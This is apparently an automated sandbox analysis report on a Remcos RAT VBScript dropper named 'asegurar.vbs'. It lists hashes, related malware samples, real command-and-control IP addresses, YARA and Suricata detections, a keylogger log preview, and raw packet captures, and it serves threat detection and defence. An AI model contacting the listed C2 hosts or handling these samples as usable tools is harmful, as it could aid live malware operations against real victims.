                                                HPDeskJet_043_SCAN.pdfGet hashmaliciousPhisherBrowse
                                                • 188.114.96.3
                                                SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.96.3
                                                Contract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                • 162.159.61.3
                                                http://linksapp.top:443Get hashmaliciousUnknownBrowse
                                                • 104.21.74.63
                                                RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.96.3
                                                p37SE6gM52.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                • 104.21.37.97
                                                3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                                • 172.67.208.139
                                                HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                • 104.21.17.90
                                                ColombiaMovilCOUvrMJYKtES.exeGet hashmaliciousSmokeLoaderBrowse
                                                • 181.204.98.226
                                                SecuriteInfo.com.Linux.Siggen.9999.31454.15725.elfGet hashmaliciousUnknownBrowse
                                                • 181.204.131.195
                                                asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 191.93.114.27
                                                OcH6iVxcMe.exeGet hashmaliciousSmokeLoaderBrowse
                                                • 181.204.98.226
                                                jade.arm6.elfGet hashmaliciousMiraiBrowse
                                                • 179.14.232.191
                                                z000023947538734 FAC-ELECTRONICAPDF.exeGet hashmaliciousRemcosBrowse
                                                • 179.14.11.136
                                                DOCUMENTO_GENERAL_ADJUNTADO_2024.EXE.exeGet hashmaliciousRemcosBrowse
                                                • 179.14.10.124
                                                SecuriteInfo.com.Linux.Siggen.9999.15962.9862.elfGet hashmaliciousMiraiBrowse
                                                • 191.88.143.180
                                                SecuriteInfo.com.Linux.Siggen.9999.8352.26322.elfGet hashmaliciousMiraiBrowse
                                                • 181.207.212.175
                                                sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 181.206.1.223
                                                TELEBUCARAMANGASAESPCOkz7iLmqRuq.exeGet hashmaliciousQuasarBrowse
                                                • 201.221.134.74
                                                bVMuPnsMIq.elfGet hashmaliciousMiraiBrowse
                                                • 190.96.128.60
                                                YfM6hAPQaS.elfGet hashmaliciousMiraiBrowse
                                                • 190.96.128.48
                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                • 190.96.128.56
                                                2YEUP84vcy.elfGet hashmaliciousMiraiBrowse
                                                • 190.13.19.189
                                                4eGsl7kZ8Y.elfGet hashmaliciousMiraiBrowse
                                                • 190.13.25.73
                                                MGmADocDSa.elfGet hashmaliciousMiraiBrowse
                                                • 170.80.8.38
                                                zEtEDBaBLY.elfGet hashmaliciousMiraiBrowse
                                                • 190.96.128.97
                                                LUNFk2Hgfu.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 190.96.128.66
                                                g7HXGuuY6X.elfGet hashmaliciousMiraiBrowse
                                                • 170.80.8.38
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                • 207.241.227.240
                                                CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                • 207.241.227.240
                                                RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                • 207.241.227.240
                                                RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                • 188.114.97.3
                                                • 207.241.227.240
                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                • 207.241.227.240
                                                450230549.exeGet hashmaliciousAgentTeslaBrowse
                                                • 188.114.97.3
                                                • 207.241.227.240
                                                450230549.exeGet hashmaliciousUnknownBrowse
                                                • 188.114.97.3
                                                • 207.241.227.240
                                                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                • 207.241.227.240
                                                https://geminiqwc-sw.top/Get hashmaliciousUnknownBrowse
                                                • 188.114.97.3
                                                • 207.241.227.240
                                                http://tiktok1688.cc/Get hashmaliciousUnknownBrowse
                                                • 188.114.97.3
                                                • 207.241.227.240
                                                No context
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):144
                                                Entropy (8bit):3.3934082720720298
                                                Encrypted:false
                                                SSDEEP:3:rhlKlRlrPlDOUNcl5JWRal2Jl+7R0DAlBG45klovDl6v:6ldNU5YcIeeDAlOWAv
                                                MD5:EEB4E6C08E0AC4D5F3F2C28347BAC57E
                                                SHA1:62701E29C0B840FFBBC90CE6AB08B7BD28F0A6E1
                                                SHA-256:7194DF8D056516B29980B78FB92D9B3A06A5062D1DEA60459E1D3983B034206B
                                                SHA-512:C2D87F74238802E3B2766D7D9C5DFC249633E817D367C674D0FFFB02DD75559D90DAB32C796C2AD21587AB2F19B0755F60D1D336407505BBB60291C58A5ADECD
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                Reputation:low
                                                Preview:....[.2.0.2.4./.0.9./.2.6. .0.4.:.5.8.:.2.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1940658735648508
                                                Encrypted:false
                                                SSDEEP:3:Nlllulv4iZ:NllUg
                                                MD5:70F8065256CFB7FD75CA2A8F72BA3FA4
                                                SHA1:5A09385998FD735B5E5BD54F5901F3B180363A57
                                                SHA-256:F5DCDC55A3BF26D5E74BE7BA34D146984239C1CF7859C598B2B5A7C1A912755B
                                                SHA-512:CE4EEEC66F3553833690F46A08D17D9165D733753A2629998961A19EE57B94CF78961B1C3A0364434A943FF6DC964C5D15233224E8CC4E62507EA792313CC5D4
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:@...e.................................~..............@..........
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Entropy (8bit):3.746077468365262
                                                TrID:
                                                • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                • MP3 audio (1001/1) 32.22%
                                                • Lumena CEL bitmap (63/63) 2.03%
                                                • Corel Photo Paint (41/41) 1.32%
                                                File name:asegurar.vbs
                                                File size:513'876 bytes
                                                MD5:68f1d5edc9ea0eed35df8223763daee8
                                                SHA1:70cace5a37a31722c7e860ce9dd9fad8ea326be1
                                                SHA256:dc8376cec72b52f0a7e6ef863740991cad8e2c99d769460e73f0593c4405fce8
                                                SHA512:e15043efa9e29c7f16aa7d99377df0e33c593275ac8b5783bf2e09b6171ff3c46b0e06a12789e5fc5774bbbc3a5a62885034784a56168cdb599184f1c0e7cb8a
                                                SSDEEP:12288:rPQSbkVemyiwLDY+QwRiGZzASD0EwcLJfbxdghlqtRLaTfhP8lV42Po/DtmUF5Lh:yoXuC9ZOGzM5HB
                                                TLSH:44B4FA1135EAB048F1F32FA356FD65E94FABB5652A36911E7048070B4BA3E80CE51B73
                                                File Content Preview:..........a.W.O.c.I.U.v.U.W.L.L.W.W.i.v.n.d.B.W.c.c.L.L.l.L.j.e.G.g.c.z.W.o.m.B.J.G.h.t.b.U.W.t.j.K.W.f.j.L.d.k.j.W.i.i.W.m.l.K.W.H.d.L.m.W.f.d.e. .=. .".W.P.r.p.c.W.A.d.L.G.m.K.c.L.L.z.c.u.c.f.C.u.b.A.Z.k.G.S.d.R.W.O.L.k.o.W.e.Z.f.b.s.c.O.l.h.K.K.d.i.G.c
                                                Icon Hash:68d69b8f86ab9a86
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-09-26T10:58:22.145275+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.749704188.114.97.3443TCP
                                                2024-09-26T10:58:22.327622+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11188.114.97.3443192.168.2.749704TCP
                                                2024-09-26T10:58:22.327622+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11188.114.97.3443192.168.2.749704TCP
                                                2024-09-26T10:58:26.305934+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761743191.93.114.273000TCP
                                                2024-09-26T10:58:28.954995+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761748191.93.114.273000TCP
                                                2024-09-26T10:58:31.600968+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761751191.93.114.273000TCP
                                                2024-09-26T10:58:34.260627+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761752191.93.114.273000TCP
                                                2024-09-26T10:58:36.960220+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761753191.93.114.273000TCP
                                                2024-09-26T10:58:39.616274+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761754191.93.114.273000TCP
                                                2024-09-26T10:58:42.257211+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761755191.93.114.273000TCP
                                                2024-09-26T10:58:44.898366+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761756191.93.114.273000TCP
                                                2024-09-26T10:58:47.538382+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761757191.93.114.273000TCP
                                                2024-09-26T10:58:50.194234+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761758191.93.114.273000TCP
                                                2024-09-26T10:58:52.851325+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761759191.93.114.273000TCP
                                                2024-09-26T10:58:55.491510+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761760191.93.114.273000TCP
                                                2024-09-26T10:58:58.178797+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761761191.93.114.273000TCP
                                                2024-09-26T10:59:00.959746+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761762191.93.114.273000TCP
                                                2024-09-26T10:59:03.616377+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761763191.93.114.273000TCP
                                                2024-09-26T10:59:06.272809+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761764191.93.114.273000TCP
                                                2024-09-26T10:59:08.944474+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761766191.93.114.273000TCP
                                                2024-09-26T10:59:11.710060+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761769191.93.114.273000TCP
                                                2024-09-26T10:59:14.366074+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761770191.93.114.273000TCP
                                                2024-09-26T10:59:17.147379+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761771191.93.114.273000TCP
                                                2024-09-26T10:59:19.804096+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761772191.93.114.273000TCP
                                                2024-09-26T10:59:22.447337+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761773191.93.114.273000TCP
                                                2024-09-26T10:59:25.085207+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761774191.93.114.273000TCP
                                                2024-09-26T10:59:28.363151+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761775181.236.206.33000TCP
                                                2024-09-26T10:59:31.010229+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761776181.236.206.33000TCP
                                                2024-09-26T10:59:33.650280+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761777181.236.206.33000TCP
                                                2024-09-26T10:59:36.306184+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761778181.236.206.33000TCP
                                                2024-09-26T10:59:38.930246+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761779181.236.206.33000TCP
                                                2024-09-26T10:59:41.585342+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761780181.236.206.33000TCP
                                                2024-09-26T10:59:44.226101+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761781181.236.206.33000TCP
                                                2024-09-26T10:59:46.912573+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761782181.236.206.33000TCP
                                                2024-09-26T10:59:49.553391+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761783181.236.206.33000TCP
                                                2024-09-26T10:59:52.210128+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761784181.236.206.33000TCP
                                                2024-09-26T10:59:54.821537+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761785181.236.206.33000TCP
                                                2024-09-26T10:59:57.414266+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761786181.236.206.33000TCP
                                                2024-09-26T10:59:59.929302+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761787181.236.206.33000TCP
                                                2024-09-26T11:00:02.446240+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761788181.236.206.33000TCP
                                                2024-09-26T11:00:04.930283+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761789181.236.206.33000TCP
                                                2024-09-26T11:00:07.397405+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761790181.236.206.33000TCP
                                                2024-09-26T11:00:10.663470+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761791181.236.206.33000TCP
                                                2024-09-26T11:00:13.091330+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761792181.236.206.33000TCP
                                                2024-09-26T11:00:15.477386+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761793181.236.206.33000TCP
                                                2024-09-26T11:00:18.736169+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.761794181.236.206.33000TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 26, 2024 10:58:17.692578077 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:17.692620039 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:17.692742109 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:17.703077078 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:17.703092098 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.322249889 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.322329044 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.328347921 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.328356028 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.328680038 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.348458052 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.395405054 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.555432081 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.555459023 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.555475950 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.555668116 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.555668116 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.555680990 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.555732965 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.647617102 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.647682905 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.647747040 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.647754908 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.647768974 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.647932053 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.648559093 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.648602009 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.648637056 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.648642063 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.648672104 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.648752928 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.736017942 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.736063957 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.736176014 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.736186981 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.736323118 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.736323118 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.737636089 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.737695932 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.737729073 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.737734079 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.737752914 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.737828970 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.739226103 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.739269018 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.739303112 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.739308119 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.739343882 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.739387035 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.740286112 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.740325928 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.740362883 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.740366936 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.740420103 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.740420103 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.827490091 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.827511072 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.827727079 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.827739000 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.827786922 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.828532934 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.828579903 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.828617096 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.828623056 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.828665972 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.829562902 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.829605103 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.829637051 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.829642057 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.829663992 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.829698086 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.830868959 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.830909967 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.830945015 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.830950022 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.830972910 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.831001043 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.831695080 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.831734896 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.831763983 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.831768990 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.831801891 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.831825018 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.834064960 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.834109068 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.834144115 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.834147930 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.834177017 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.834211111 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.834655046 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.834713936 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.834779024 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.834785938 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.834795952 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.834829092 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.917326927 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.917376995 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.917473078 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.917481899 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.917534113 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.917745113 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.917788982 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.917819977 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.917824984 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.917849064 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.917881012 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.918237925 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.918258905 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.918313980 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.918319941 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.918364048 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.918391943 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.918701887 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.918745041 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.918778896 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.918783903 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.918829918 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.919192076 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.919246912 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.919277906 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.919284105 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.919327974 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.919358969 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.919559002 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.919610977 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.919642925 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.919648886 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.919688940 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.919715881 CEST49703443192.168.2.7207.241.227.240
                                                Sep 26, 2024 10:58:18.920114994 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.920160055 CEST44349703207.241.227.240192.168.2.7
                                                Sep 26, 2024 10:58:18.920201063 CEST49703443192.168.2.7207.241.227.240
